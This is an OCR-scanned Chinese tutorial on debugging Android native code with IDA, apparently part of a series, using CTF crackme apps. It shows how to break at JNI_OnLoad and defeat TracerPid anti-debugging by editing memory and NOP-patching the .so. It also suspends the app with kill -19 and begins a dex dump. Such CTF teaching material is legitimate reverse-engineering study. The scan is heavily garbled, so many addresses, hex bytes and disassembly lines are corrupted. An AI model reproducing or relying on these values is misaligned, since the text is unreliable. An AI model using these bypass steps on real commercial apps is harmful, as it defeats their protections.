这 时 候 我 们 启动 da 并 attach 这 个 app 的 进程 。 
6 suspend on libary loading 


我 们 在 debugger setup £ 4] # suspend on library load。 然 后 点 击 继 续 。 
FP Debugger setup iem 


Events Logging 

m Suspend on debugging start [7] Segment modifications 
| Evaluate event condition on exit [J] Thread start/exit 

V| Suspend on process entry point [v] Library load/unload 

| Suspend on thread start/exit || Breakpoint 


uspend on library load/ oad [4| Debugging message 








~] Suspend on debugging message 


Event condition 


Üptions 

i Reconstruct the stack 

|| Show debugger breakpoint instructions 
|| Use hardware temporary breakpoints 


~] Autoload PDB files 





F] Set as just-in-time debugger 





Edit exceptions | | Reload exceptions | 








Cemi] Cii 





7 jdb -connect com.sun.jdi.SocketAttach:hostname=127.0.0.1, port=8700 
用 jdb 将 app 恢 复 执行 。 
8 add breakpoint at JNI_OnLoad 


随后 程序 会 在 加 载 libcrackme.so 这 个 so 文件 的 时 候 停 住 。 这 时 候 ida 会 出 现 找 不 到 文件 的 提 
示 ， 不 用 管 他 ， 点 取消 即 可 。 随 后 就 能 在 modules 中 看 到 libcrackme.so 这 个 so 文件 了 ， ae 
点 进去 ， 然 后 在 JN|_OnLoad 处 下 个 断 点 ， 然 后 点 击 执行 ， 程 序 就 进入 了 JNI_ OnLoad() 这 

数 。 


PS : 有 时 候 你 明明 在 一 个 函数 中 却 无 法 F5， 这 时 候 你 需要 先 按 一 下 "p" 键 ， 程 序 会 将 这 段 代码 
作为 函数 分 析 ， 然 后 再 按 一 下 "F5”， 你 就 能 够 看 到 反 汇 编 的 函数 了 。 


因为 过 程 有 点 繁琐 ， 我 录制 了 一 个 调试 JN|_OnLoad() 的 视频 在 我 的 github， 有 兴趣 的 同学 可 
以 去 下 载 观看 。 因 为 涉及 到 其 他 的 技巧 ， 我 们 将 会 在 随后 的 "ida 双 开 定 位 "章节 中 继续 讲解 如 
何 调试 .init_array 中 的 元 数 。 
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0x04 Idax JF x 4s 


lda 双 开 定 位 的 意思 是 先 用 jida 静 态 分 析 so 文 件 ， 然 后 再 开 一 个 jda 动 态 调试 so 文件 。 因 为 在 动 
态 调 试 中 ida 并 不 会 对 整个 动态 加 载 的 So 文件 进行 详细 的 分 析 ， 所 以 很 多 函数 并 无 法 识别 出 
来 。 比 如 静态 分 析 中 有 很 多 的 sub XXXX 函 数 : 


| A |f Functions window & ER Program Seg ? 


= name 








Java_com_yaotong_crackme_MainActivity_ 
sub_130C 

sub_16A4 

sub_17F4 

JNI OnLoad 


m 





sub_22AC 
sub_2378 
sub_239C - 
sub 2494 

sub 24F4 

sub 254C 

sub 258C 

. umodsi3 

f| aeabi drsub 


但 动态 调试 中 的 ida 是 没有 这 些 信息 的 。 


Modules ©) | [E] Module: liberackme. so E 


Name 


S S RS RA DA DS Da Da Dd Da DA DS Ra 














by) Java com yaotong crackme MainActivity securityCheck 





JNI OnLoad 

. umodsi3 

. aeabi drsub 

. subdf3 

. aeabi dsub 

. adddf3 

. aeabi dadd 

. floatunsidf 

. aeabi ui2d 

. aeabi i2d 
floatsidf 





me OCT UU VV oo oC fc 





所 以 我 们 需要 双开 ida， 然 后 通过 ida 静 态 分 析 的 内 容 来 定位 ida 动 态 调 试 的 函数 。 当 然 很 多 时 
候 我 们 也 需要 动态 调试 的 信息 来 帮助 理解 静态 分 析 的 函数 。 


在 上 一 节 中 ， 我 们 提 到 .init.array 中 有 个 sub_2378()， 但 当 ida 动 态 加 载 so 后 我 们 并 无 法 在 
module 中 找到 这 个 函数 。 那 该 咋 办 呢 ? 这 时 候 我 们 就 要 通过 静态 分 析 的 地 址 和 so 文件 在 内 存 
中 的 基 址 来 定位 目标 函数 。 首 先 我 们 看 到 Sub_2378() 这 个 函数 在 静态 分 析 中 的 地 址 

为 ,text:00002378。 而 在 动态 加 载 中 这 个 so 在 内 存 中 的 基 址 为 : 4004F000 ° 
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BB Modules ns 


Path Base 










HJ /system/bin/app. process 
pp-lib/com.yao 





; 4004F000 


1g.crackme-1/libcrackme.so 


aB /system/lib/libz.so 40056000 
aB /system/lib/libETC1.so 4006E000 
aB /system/lib/libstdc++.so 4007A000 
(»B| /system/lib/libemoji.so 4007D000 
aB) /system/lib/libcorkscrew.so 40084000 
/system/lib/libm.so 40096000 


此 sub 2378()3k A BAe A A P AE 5 WSL HR A 4004F000 + 00002378 =40051378 ° F 
面 我 们 在 动态 调试 窗口 输入 "g”， 跳 转 到 40051378 这 个 地 址 。 然 后 发 现 全 是 乱码 的 节奏 : 


libcrackme .so:46651378 DCB 6 
libcrackme.so:^8051379 DCB 6x48 ; H 
libcrackme.so:^8051378 DCB 8x2D ; - 
libcrackme .so:4665137B DCB OXE? ; 
libcrackme .so:4665137C DCB 60x18 
libcrackme.so:^805137D DCB 8 
libcrackme.so:5805137E DCB 8x9F ; 
libcrackme.so:5805137F DCB 8xE5 ; 
libcrackme.so:^8051388 DCB 60x18 
libcrackme .so:46651381 DCB 6x16 
libcrackme.so:^8051382 DCB 8x9F ; 
libcrackme.so:5^8051383 DCB OxE5 ; 
libcrackme .so:46651384 DCB 8 
libcrackme.s0:58051385 DCB 8 
libcrackme.so:5^8051386 DCB 8xS8F ; 
libcrackme.so:5^8051387 DCB OxE8 ; 
libcrackme.so:^8051388 DCB 8 
libcrackme.s0:58051389 DCB 8 
libcrackme .so:4665138A DCB 6x81 ; 
libcrackme.so:^805138B DCB 6xE6 ; 
libcrackme .so:4685138C DCB 6xC6 ; 
libcrackme .so:4665138D DCB 8xFF 
libcrackme.so:^805138E DCB 8xFF 
libcrackme.so:^805138F DCB 8xEB ; 


不 要 担心 ， 这 是 因为 ida 认 为 这 里 是 数据 段 。 这 时 候 我 们 只 要 按 "P” 或 者 选中 部 分 数据 按 "C”， 
ida 就 会 把 这 段 数据 当成 汇编 代码 进行 分 析 了 : 

libcrackme .so:40051378 ; =============== SUBROUT I N E ======================================= 
libcrackme .so:46051378 


libcrackme .so:40051378 
libcrackme -50:49951378 sub_46651378 


libcrackme .so:46651378 STMFD SPt, {R11,LR} 

libcrackme .so:4665137C LDR R8, -(unk 548854FBC - 6x%4605138C) 
libcracknme.so:540051388 LDR R1, -8xFFFFBCEC 

libcrackme .so:46651384 ADD R8, PC, RO ; unk_40054FBC 
libcrackme.so:50051388 ADD R8, R1, R8 

libcrackme .so:4665138C BL unk_466512AC 

libcrackme .so:46651396 LDHFD SP*, (R11,PC) 





libcrackme.so:50051398 ; End of function sub _ 48051378 
我 们 随后 还 可 以 按 "F5”, 将 汇编 代码 反 编 译 为 C 语 言 。 
sub_46651378() 


1 
return (Cint ({ fastcall *)( DUDRD))unk ^885128C)(&unk ^8858CR8); 


261 


是 不 是 和 静态 分 析 中 的 sub 2378() 长 的 差 











int sub 2378() 


i 
return sub 22AC((int)sub_1CA8); 


》 


我 们 随后 可 以 在 这 个 位 置 加 入 断 点 ， 再 结合 上 一 节 提 到 的 调试 技巧 就 可 以 对 init.array 中 的 部 数 
进行 动态 调试 了 。 


我 们 接 下 来 继续 分 析 自 毁 程 序 这 道 题 ， 当 我 们 在 对 init.array 和 JNI_OnLoad() 进 行 调试 的 时 
疼 ， 发 现 程 序 在 执行 完 dowrd 400552B4() 后 就 挂 掉 了 。 


el < 





i Te C TOSREORI ATANES ud ARIE ETERI LUSII 
| = 65540; 


于 是 我 们 在 这 里 按 "F7” 进 入 函数 看 一 下 : 


libc. so: 40140024 pthread create 






libc .so:46146A28 SUB SP, SP, #6x14 


原来 是 libc.so 的 phread_create() 函 数 ， 估 计 是 app 本 身 开 了 一 个 新 的 线程 进行 反 调 试 检 测 了 。 


有 意思 的 是 在 静态 分 析 中 我 们 并 不 清楚 dword_62B4 这 个 函数 是 做 什么 因为 这 个 函数 的 地 
址 在 . bask ha 被 初始 化 : 
handle[-2] 


dword 62Bh(handle, 8, sub 1685, 8); 
sub 17F5^(); 


» 


} 





.bss:888862B^ ; int (  fastcall xdword 62B4)(_ DUORD, DWORD,  DUORD, _DWORD) 
-bss : dvord 62B^ a4 ; DATA XREF: sub_16D4+28Tr 








但 是 当 我 们 动态 调试 的 时 候 ， 这 个 地 址 的 值 已 经 修改 为 了 phread _ create() 这 个 函数 的 地 址 
fe: 


libcrackme.so:58855285 ; int (_ fastcall *dword_460552B4)(_DWORD, DWORD, DWORD, _DWORD 
libcrackme.so:400552B4 dword 400552B4 DCD 6x46146A24 





libc.so: 40159825 pthread create 





libc.so:h8158828 SUB SP, SP, #6x14 


所 以 说 自 毁 程序 密码 这 个 app 会 用 pthread_create() 开 一 个 新 的 线程 对 app 进 行 反 调试 检测 。 线 
程 会 运行 sub 16M4) 个 函数 。 于 是 我 们 对 这 个 函数 进行 分 析 ， 发 现 里 面 的 内 容 有 大 量 的 混 
淆 ， 看 起 来 十 分 吃力 。 这 里 我 介绍 个 小 trick : 常见 的 反 调试 方法 都 会 用 fopen 打 开 一 些 文件 来 
检测 自己 的 进程 是 否 被 attach， 比 如 说 status 这 个 文件 中 的 tracerpid 的 值 是 否 为 0， 如 果 为 0 说 
明 没 有 别 的 进程 在 调试 这 个 进程 ， 如 果 不 为 0 说 明 有 程序 在 调试 。 所 以 我 们 可 以 守株待兔， 在 
libc.so 中 的 fopen() 处 下 一 个 断 点 ， 然 后 我 们 在 hex view 窗 口中 设置 数据 与 R0 的 值 同步 : 


ibc.so:461565D4 MOU .W R2, #6x1B6 





ibe .so:461565D8 BL open | IDA View-PC 
ibe.so:461565DC CHP R8, #8 


NXKNOWN 401505B4: libc.so:fopen 
| " | 


Pseudocode-A 


Pseudocode-B 














View-l oOx 回 Stack vie bl 
14 88 80 00 66 66 OO 66 GOG HG O O8 OG GG OB O8 OD ................ ^ "n 
24 88 80 00 66 OO OO O8 O0 G6 00 08 GƏ GG O8 O8 OD ................ SE936B9C R2 
34 88 80 66 66 00 OO O8 HOG GO 00 O8 GG GG OB 88 OO ................ I iÁàrecaaznan... R3 
44 66 00 00 00 00 OO 99 OG GH HA 88 GO OG OG GG OB ................ Edit... F2 

54 2F 70 72 6F 63 2F 32 31 36 38 39 2F 73 7h 61 7h /proc/21689/stat Data ornat : = 
64 75 73 88 80 08 OG OG HOO 66 OG 80 08 80 99 99 BO us.............- R5 
74 00 08 66 OO OO 99 OO OO 88 OO OG O0 99 O0 99 O8 ................ Con s R6 
84 808 80 00 00 00 00 O0 GO HO 00 08 GO 00 08 88 OO ................ Text > 

94 898 80 00 08 GO 00 66 GO GO 00 08 GO 00 O8 88 OO ................ | R7 
A4 OG 80 00 OG GO OG O0 GO GO 00 GG GO 00 99 88 OO ................ 园 Save to file... | R8 
8^ 808 80 00 08 C7 1B 19 54 9652 05 40 38 31 5B 5D ....... T.R.G81[] ET sil c 
Ph oh AA AC LA AAR AN AN AR oh WA AC LA AR AN dn rm a a 1 





这 样 的 话 ， 当 函数 在 fopen 处 停 住 的 时 候 我 们 就 能 看 到 程序 打开 了 哪些 文件 。 果 不 其 然 ， 程 序 
打开 了 /proc/[pidl/status 这 个 文件 。 我 们 ?F8" 继 续 执 行 fopen 函 数 ， 看 看 返回 后 的 地 址 在 哪 。 然 
后 发 现 我 们 程序 卡 在 了 某 个 函数 中 间 ，PC 上 面 都 是 数据 ，PC 下 面 才 是 汇编 。 这 该 咋 办 呢 ? 


* llibcrackme.so:^88058415 DCB GxAF 

* lLiberackme .so:40050415 DCB  8xF 

* 1ibcrackme .so: 466560416 DCB 8x8D ; 
* lLiberackme .so:46650417 DCB 6xE2 ; 
* lLibcrackme .so:40050418 DCB 4 

* lLiberackme .so:40050419 DCB 8x18 
* lLiberackme.so:4665641A DCB 6xAB ; 
* aüibcrackme.so:^885851B DCB OxE1 ; 
* |1ibcrackme .so:4665 641C DCB 6x35 

* lLiberackme .so:4665641D DCB OxFF 

* 1ibcrackme .so: 4665 641E DCB 8x2F ; / 
* lLiberackme .so:46685641F DCB OxE1 ; 


Wee Tele TAL RT IEA A] oka ATE mandates E EE 


be 





© libcracknme.so:40050424 HOU R5, R8 

^ \Libcrackme .so:4665 6428 MOU R1, #6x266 

^ libcracknme .so:4665642C HOU R2, #8 

^ libcracknme .so:40050430 HOU R8, R6 

^ libcracknme .so:40050434 STR R5, [SP,#6x34] 
^ libcracknme.so:40050438 BL unk 488588E8 
^ Bibcrackme.so:^885843C LDR R3, [R4,#6x16] 


解决 办 法 还 是 jida 双 开 ， 我 们 知道 现在 PC 的 地 址 为 40050420，libcrackme.so 文 件 的 基 址 为 
4004F000。 因 此 这 段 代码 在 so 中 的 位 置 应 该 是 : 40050420 - 4004F000 = 1420。 因 此 我 们 回 
到 ida 静 态 分 析 界 面 ， 就 可 以 定位 到 我 们 其 实 是 在 sub_130C() 这 个 函数 中 。 于 是 我 们 猜测 这 个 
函数 就 是 用 来 做 反 调 试 检测 的 。 





- text : 66661468 STR R8, [SP,#6x348+var_338] 
.- text : 66661460 ADD R8, PC, R8 ; _GLOBAL_OFFSET_TABLE_ 
-text : 66661416 ADD R^, R?, R8 

-text: 66661414 ADD R8, SP, #6x348+vuar_8C 
.text : 66661418 MoU R1, R^ 

-text:88881541C BLX R5 

.text : 66661424 MoU R5, R8 

-text: 66661428 HOU R1, #6x266 
-text:0000142C HOU R2, #6 

.-text:00001430 HOU R8, R6 

-text : 66661434 STR R5, [SP,#6x348+var_314] 


因此 我 们 可 以 通过 基 址 来 定位 sub_130C() 这 个 函数 在 内 存 中 的 地 址 : 40050420 + 130C = 
4005030C。 然后 我 们 在 4005030C 这 个 地 址 处 按 "P”，ida 就 可 以 正确 的 识别 整个 函数 了 。 


hibcrackne .s0:4005030C ; --------------------------------------------------------------------------- 


libcrackme .so : 4665 63 6C STMFD SP*, <{R4-R11,LR} 
libcrackme .so: 46656318 SUB SP, SP, #0x324 
Libcrackme .so:48656314 LDR R8, =(unk_46654FBC - 6x46656328) 
\libcrackme .so: 46656318 MOU R1, #0x64 
libcrackme.so:^4885031C MOU R2, #0 
lüibcrackme.s0:5480580328 ADD R4, PC, RO ; unk_4S6654FBC 
libcrackme.s0:^40050325 LDR RG, -8xFFFFFFD8 
libcrackme.so:^48050328 LDR R8, [R8,RA^] 

libcrackme .so:4665632C LDR R8, [R8] 

libcrackme .so: 46656338 STR R8, [SP,16x328] 
üibcrackme.so:^48850335 ADD R8, SP, HOx2BC 

libcrackme .so:46656338 BL unk_466566E6 

Libcrackme .so:4665633C LDR R7, -8x2D^ 





所 以 说 动态 调试 的 时 候 可 以 帮 我 们 了 解 到 很 多 静态 分 析 很 难 获取 到 的 信息 。 这 也 就 是 jida 双 开 
的 意义 所 在 : 静态 帮助 动态 定位 函数 地 址 ， 动 态 帮助 静态 获取 运行 时 信息 。 


0x05 lda 动 态 修改 内 存 数据 和 寄存 器 数值 


我 们 继续 分 析 自 毁 程序 密码 这 个 app， 我 们 发 现 该 程序 会 用 fopen () 打 开 /proc/[pid]/status 这 个 
文件 ， 随 后 会 用 fgets() 和 strstr() 来 获取 ， 于 是 我 们 在 strstr() 处 下 个 断 点 ， 然 后 让 hex view 的 数 
据 与 RO 同步 。 每 次 点 击 继续 ， 我 们 都 会 看 到 strstr 传 入 的 参数 。 当 传 入 的 参数 变 为 
TracerPid:XXXX 的 时 候 我 们 停 一 下 。 因 为 在 正常 情况 下 ，TracerPid 的 值 应 该 是 0。 但 是 当 被 
调试 的 时 候 就 会 变 成 调试 器 的 pid。 


libc .s0:4615821C strstr ——- she Seatac 
B libc.so:h815821C - PUSH.W {R4-R8,LR} 
© libc.so:58158228 HOU R^, R8 


g 72 61 63 65 72 58 69 64 3A 89 32 34 38 35 34 TracerPid: .24854 


为 了 防止 程序 发 现 我 们 在 调试 ， 在 这 里 我 们 需要 把 值 改 回 0。 我 们 在 hex view 的 2 那里 点 击 右 
键 ， 然 后 选择 edit。 随 后 我 们 输入 30 和 00， 再 点 击 "apply changes”。 就 可 以 把 TracerPid 改 为 0 
了 。 然 后 就 可 以 bypass 这 一 次 的 反 调 试 的 检测 。 


5EA36C54 54 72 61 63 65 72 50 69 64 3A 89 39 T bs 35 35 TracerPid: .8.854 
5EA36C64 8n 66 29 GA 08 GA OO 66 HA OO OA 66 68 60 OG 68  --)------------- 


但 这 个 程序 检测 TracerPid 的 次 数 非常 频繁 ， 我 们 要 不 断 的 修改 TracerPid 的 值 才 行 ， 这 种 方法 
实在 有 点 治标 不 治本 ， 所 以 我 们 会 在 下 一 节 介绍 patch so 文件 的 方法 来 解决 这 个 问题 。 


另外 在 ida 动 态 调试 过 程 中 ， 除 了 内 存 中 的 数据 可 以 修改 ， 寄 存 器 的 数据 也 是 可 以 动态 修改 
的 。 比 如 说 程序 执行 到 CMP R6, #0。 本 来 R6 的 值 是 0， 经 过 比较 后 ， 程 序 会 跳 转 到 
4082A3FC 这 个 地 址 。 


libdum.so:4682A1F8 





Libdum.so:4682A1FA BEQ.W loc A08283FC 
但 是 如 果 我 们 在 PC 执行 到 4082A1F8 这 条 语句 的 时 候 ， 将 R6 的 值 动 态 修改 为 0。 程序 就 不 会 进 
行 跳 转 了 。 
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R8 5C9F5618 & debug898:5C9F^618 

R1 58372888 & daluik aux structure: 
R2 88888888 ù 

R3 58372088 & daluik aux structure: 
R^ 888941FC & 

5C7RB888 & debugihu5:5C7RnB888 





[fS] Open register window 


Modify value... 

Zero value 0 
Toggle value Space 
Increment value + 


Decrement value - 


Copy 





Hew value 





你 其 至 可 以 修改 PC 寄存 器 的 值 来 控制 程序 跳 转 到 任何 想 要 跳 转 到 的 位 置 ， 简 直 和 ROP 的 原理 
一 样 。 但 记得 要 注意 栈 平衡 等 问题 。 


PSR2888 必 Jump 


[E] Jump in a new window 


=] Open register window 
Modify value... 





Zero value 0 
Toggle value Space 
Increment value = 


Decrement value - 





fnm 


0x06 Patch so 文件 


在 上 文中 ， 我 们 通过 分 析 定 位 到 Sub 130C() 这 个 函数 有 很 大 可 能 性 是 用 来 做 反 调 试 检 测 的 ， 
并 且 作者 开 了 一 个 新 的 线程 ， 并 且 用 了 一 个 while 来 不 断 执行 sub_130C() 这 个 函数 ， 所 以 说 我 
们 每 次 手动 的 修改 TracerPid 实 在 是 不 现实 。 
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. noreturn sub 1685í() 





| while ( 1 ) 

H < 

' sub 138C6(); 

| dword 62B8(3); 
me 


既 en 何不 把 sub_130C() 这 个 函数 给 nop 掉 呢 ? 为 了 防止 Nop 出错， 我 们 先 在 "F5” 界 面 
择 所 有 代码 ， 然 后 用 ?Copy to assembly" 功 能 ， 就 可 以 把 c 语 言 代 码 注 释 到 汇编 代码 里 。 


jvoid _ noreturn sub _16A4¢} 


while ( 1 ) 
< 
sub_ 13606): 
Edit comment 
Edit block comment 


Generate HTML 


Mark as decompiled 


Copy to assembly 


Hide casts 








-text:666616A4 sub_16A4 ; DATA XREF: JNI_OnLoad+A8yo 
- text : 666616A4 ; -text:off_1CA4o 

.- text: 666616A4 STHFD SP*, {R4,LR} 

-text:88881668 LDR R8, -( GLOBAL OFFSET TABLE - 8x16B8) 

- text: 666616AC LDR R1, -(unk 6298 - 6x5FBC) 

-text:888816B8 ADD R8, PC, R8 ; _GLOBAL_OFFSET_TABLE_ 

. text: 666616B4 ADD R4, R1, R8 ; unk 6298 

-text:8808016B8 ; 2: while ( 1 ) 

-text:888016B8 ; 4: sub_136C(¢); 

-text:888816B8 

-text:888816B8 loc 16B8 ; CODE XREF: sub_16A4+24)j 
-text:888816B8 BL sub 138€ 

-text:B88816BC ; 5: dword 62B8(3); 

.- text : 6660616BC LDR R1, [R4,#(dword_ 62B8 - 6x6296)] 
.-text:888816C8 HOU R8, #3 

-text:00001őC4 BLX R1 

- text :666616C8 B loc_16B8 

-text:666616C8 ; End of function sub 16A4 


在 这 里 我 们 看 到 如 果 想 要 注释 掉 sub 130C() 有 函数， 只 需要 注释 掉 000016B8 这 个 位 置 上 的 代码 
即 可 ， 如 果 我 们 想 要 注释 掉 dword 62B0(3) 这 个 函数 ， 我 们 则 需要 注释 掉 000016BC- 
000016C4 这 三 个 位 置 上 的 代码 。 接 下 来 我 们 选中 000016B8 这 一 行 ， 然 后 再 点 击 HexView 。 
HexView 会 帮 我 们 自动 定位 到 000016B8 这 个 位 置 。 





SERES DA E^ FF ae D? 
66661688 66 4B 66 860 A5 
66661698 AC 49 88 88 38 
80001688 1C 88 9F E5 1C 18 9F E5 66 66 SF EG 66 46 81 EG ....... 
28 
85 
an 


5s ji B ty FF E i is a es Miss 
4B 86 66 96 49 66 88 18 46 2D E9 .I..80K. 


888016B8 EMi i: 
98898616C8 FA FF FF EA 


fafafafa-4 £ Té an nha Ln ra 


91694 E5 63 88 AG ES 31 FF 2F E1 .... +. 
49 880 88 D4 82 88 86 66 48 2D E9 ..... f; 


nr rr om an nr rr nn afm “aa rn» M dà 
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因为 ARM 是 没有 单独 的 NOP 指 令 的 。 于 是 我 们 采用 movs r0,r0 作 为 NOP。 对 应 的 机 器 码 为 "00 
00 A0 E1”。 所 以 我 们 把 ”13 FF FF EB” 这 段 内 容 修 改 为 "00 00 AD E1” ° 


ASP 二 vv Su GENS ia ei use CA cUAL a Stata Syme 


Em | eh | Ole ver D 


Tate DA EN TR FF D7 "下 
00001688 66 4B 88 66 AS = ^ FF ii vs FF FF Ys 4B 880 00 .K.... 
00001698 AC 49 00 00 30 4B OG OG 96 49 OA OO 18 48 2D E9 .I..0GK 
00001688 1C 88 9F E5 1C 18 9F ES 66 88 8F EG 66 48 81 EB ...... 
880016B8 28 18 95 E5 63 AG E3 31 FF 2F E1 ...... 
600016C8 FA FF FF EA 64 49 66 08 D 62 66 OG 88 48 2D E9 ..... I 
60801608 88 DƏ 4D E2 38 88 9F E5 38 18 9F E5 88 38 AB E3 ..H.8. 


我 们 再 回 "F5" 界 面 ， 就 会 发 现 Sub_130C() 函 数 已 经 没有 了 。 














© 3| while ( 1) 
e. dword 62B8(3); 
e5 


最 后 我 们 点 击 "Edit->Plugins->modifyfile”， 然 后 就 可 以 保存 新 的 so 文件 了 。 我 们 将 这 个 so 文件 
盖 原 apk 中 的 So 文件 ， 然 后 再 重新 签名 。 
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Jump Search View Debugger Options Windows Help 
































|l Copy Ctrl+C sa): Al @ |: od of gt a XD 
| porte. stec OM 
Begin selection Alt+L 
I Sel i on |. Unexplored BM Instruction External symbc 
ect a 
F ear -AE Pseudocode-C E 
à Select identifier Shift+Enter me Em View hl i scii 
id 1jvoid _noreturn sub 16A4() 
+ Code C 2K 
m 3| while ( 1) 
E Data D 92 dword 62B8(3); 
ar Struct var... Alt+Q $955 
i P Strings » 
Ng Array... Numpad +* 
d XK undefine U 
r [4] Rename N 
4 Operand type > 
1 Comments > 
s Segments > 
3 Structs b 
d d 
J Functions > | Quick run plugins Ctrl+3 
s Patch program 上 ae 
d UnicodeStringViever Ctrl+U 
Other > 
s - turbodiff v1.01b r1 Ctrl -F11 
s Plugins » 
2 SmartDec 
b 24194 
sub. 24F4 PatchDiff2 Ctrl+8 
ee Jump to next fixup Alt+F12 
E ER B ^ modifyfile Alt+P 
sM d liinb-Bar ova Ales 





这 次 我 们 先 运行 程序 ， 再 用 jida 加 载 ，app 并 没有 闪 退 ， 说 明 我 们 patch 成 功 了 。 于 是 我 们 先 
在 "Java_com_yaotong_crackme _MainActivity_securityCheck" 处 下 断 点 。 然 后 在 app 随 便 输 
入 一 个 密码 ， 点 击 app 上 的 "输入 密码 "按钮 。 


libcrackme .so:4664D1A8 
libcrackme.so:4885D1808 Java com yaotong crackme MainActivity securitucheck 






po | libcrackme .so:4664D1AC SUB SP, SP, #8 


CoE r a o ete oe 44488474 uni nr 


程序 就 会 暂停 在 "Java_com_yaotong crackme MainActivity securityCheck" 4b » 4&1 Jt 
控 "P" 再 掖 *F5"， 就 可 以 看 到 反 汇 编 的 C 语 言 了 。 而 这 里 的 unk_4005228C 就 是 保存 了 密码 字符 
串 指 针 的 指针 。 
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€" 31| U5 = (*(int ( tastcall *x)(ini 
e 32| v6 = : 
è 33| while ( 1) 
34| { 
e 35 u7 = *( BYTE *)u6;5 
e 36 if ( v7 t= *(_BYTE x)u5 ) 
e 37 break; 
e 38 *tuó6; 
e 39 **u5; 
e 46 v8 = 1; 
em if £( fu7 ) 
e 42 return v8; 


为 是 指针 的 指针 ， 所 以 我 们 先 双 击 进入 


libcrackme.so:5805228C junk_4665228C 
libcrackme.so:^805228D 
libcrackme.so:^805228E 
libcrackme.so:^805228F 
libcrackme.so:^8052298 
libcrackme .so:46652291 


然后 在 这 个 地 址 上 按 三 


LIDCFacKme -50:4002ZZNH 
libcrackme.so:4665228C dword 4665228C 
lihrrackme .ca:4AfhS?29R 


然后 我 们 再 双击 进 


libcrackme.so: 46656456 unk_ 46656456 
libcrackme .so:46656451 
libcrackme .so:4665 6452 
libcrackme .so:46656453 
libcrackme .so:4665 6454 
libcrackme .so:4665 6455 
libcrackme .so: 4665 6456 
libcrackme .so:4665 6457 
libcrackme .so:4665 6458 
libcrackme .so:4665 6459 
libcrackme .so:4665645A 
libcrackme .so:4665645B 
libcrackme .so:4665645C 


这 道 题 里 我 们 只 
改变 条 件 判断 语句 ， 比 如 将 "BNE” 变 
B 到 某 个 地 址 去 执行 ， 这 


这 个 地 址 ， 就 可 以 看 到 最 后 的 flag 了 


“是 用 到 了 很 简单 的 patch so 技巧 ， 在 实战 中 我 们 不 光 可 以 NOP， 我 们 还 
为 "BEQ”。 
样 的 话 就 不 需要 挨个 的 NOP 很 多 语句 了 。 要 注意 的 是 ，ARM 中 的 跳 


这 个 地 址 。 
DCB 6x56 ; P 
DCB 4 
DCB 5 
DCB 6x46 ; (3 
DCB 6 
DCB 8 


下 "D”， 将 这 里 的 数据 格式 从 字符 转化 为 指针 形式 。 


DUB UX50 ; U 
DCD 
DER A 


° & € x”aiyou,bucuoo” ° 


DCB 8x61 ; a 
DCB 6x69 ; i 
DCB 8x79 ; y 
DCB 8x6F ; o 
DCB 8x75 ; u 
DCB 8x2€ ; , 
DCB 8x62 ; b 
DCB 8x75 ; u 
DCB 8x63 ; c 
DCB 8x75 ; u 
DCB 8x6F ; o 
DCB 8x6F ; o 
DCB 8 


“可 以 
我 们 甚至 可 以 修改 跳 转 地 址 ， 比 如 直接 让 程序 


转 指令 是 根据 相对 地 址 计算 的 ， 所 以 你 要 根据 当前 指令 地 址 和 目标 地 址 来 计算 出 相对 跳 转 的 


值 。 


比如 说 00001BCC: BEQ loc_1C28 对 应 的 汇编 代码 为 "15 00 00 0A”。 


MN wis 


-text:99991BCC BEQ 


mam ns 





88881BCC 


fafafafa4 rine 


15 66 66 6A 


fal. Fü ür ra 


0x0A 代 表 BEQ * 
(下 一 条 的 下 一 条 ) 指令 
到 的 地 址 : 


， "15 00 00” 代 表 跳 转 的 相对 地 址 ， 因 为 在 arm 中 pc 的 值 是 当前 指令 
的 地 址 ， 所 以 我 们 需要 将 0x15 再 加 上 2。 随 后 就 可 以 计算 出 最 后 跳 转 
(0x15 + 0x2)*4 + 0x1BCC = 0x1C28。lda 反 汇编 后 


mr mu 


loc_1C28 


的 下 两 条 


的 结果 也 验证 了 结果 是 BEQ 


BO 


loc 1C28 ° 


接 下 来 我 们 想 修改 汇编 代码 为 00001BCC: BNE loc_1C2C。 只 需要 将 "0A" 变 成 "1A"”， 将 "15" 变 


成 "16" 即 可 。 
|-text:88881BCC BNE loc_1€2C 
juuuUVU IDDUu uu uu OT LU c 


/80881BCC 16 66 66 1A 


0x07 Kill 调 试 技巧 


a ae MA a ln ho 
挂 载 上 去 ， 获 取 有 用 的 信息 ， 然 后 可 以 再 用 kill 将 程序 恢复 运行 。 我 们 还 毁 程 序 密 码 这 
个 应 用 举例 ， 具 体 实行 方法 如 下 : 


1 ps 获取 返 运行 的 app 的 pid o 





ua_a56 1223 129 


2 然后 用 kill -19 [pid] 就 可 以 将 这 个 app 挂 起 了 。 


kill -19 1223 


Eus" # kill -19 1223 





3 随后 我 们 用 ida attach 上 这 个 app。 因 为 整个 进程 都 挂 起 了 ， 所 以 这 次 ida 挂 载 后 app 并 没有 闪 
退 。 然 后 就 可 以 在 内 存 中 找到 答案 了 。 





S92AE456 m 69 79 6F 75 2C 62 75 63 75 6F 6F 88 4C 37 39 aiyou,bucuoo.lL 


4 如 果 想 要 恢复 app 的 运行 ， 需 要 将 ida 退 出 ， 然 后 再 使 用 kill -18 [pid] 即 可 。 
shell@android:/ # kill -18 1223 





kill -18 1223 


0x08 Æ A 4 F dump Dex x # 


在 现在 的 移动 安全 环境 中 ， 程 序 加 党 已 经 成 为 家 常 便 饭 了 ， 如 果 不 会 脱党 简 直 没 法 在 破解 界 
混 的 节奏 。ZJDroid 作 为 一 种 万 能 脱党 器 是 非常 好 用 的 ， 但 是 当 作者 公开 发 布 这 个 项 目 后 就 遭 
到 了 各 种 加 党 器 的 针对 ， 比 如 说 抢占 ZJDroid 的 广播 接收 器 让 ZJDroid 无 法 接收 命令 等 。 我 们 
也 会 在 " 安 卓 动态 调试 七 种 武器 之 多 情 环 - Customized DVM” 这 篇 文章 中 介绍 另 一 种 架构 的 万 

能 脱 壳 器。 但 工具 就 是 工具 ， 当 我 们 发 布 的 时 候 可 能 也 会 遭 到 类 似 ZJDroid 那 样 的 针对 。 所 以 
说 手动 脱党 这 项 技能 还 是 需要 学 习 的 。 在 这 一 节 中 我 们 会 介绍 一 下 最 基本 的 内 存 dump 流 程 。 
在 随后 的 文章 中 我 们 会 介绍 更 多 的 技巧 。 


这 里 我 们 拿 alictf2014 中 的 apk300 作 为 例子 来 介绍 一 下 ida 脱 简单 党 的 基本 流程 。 首先 我 们 用 
调试 JNI_OnLoad 的 技巧 将 程序 在 运行 前 挂 起 : 
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adb shell am start -D -n com.ali.tg.testapp/.MainActivity 
中 7Z20dvmDexFileOpenFr 





Copy 
Copy all 


_Z2idvmDexFileOpe 
-Zi4ádvmJarFileOpenPK: 
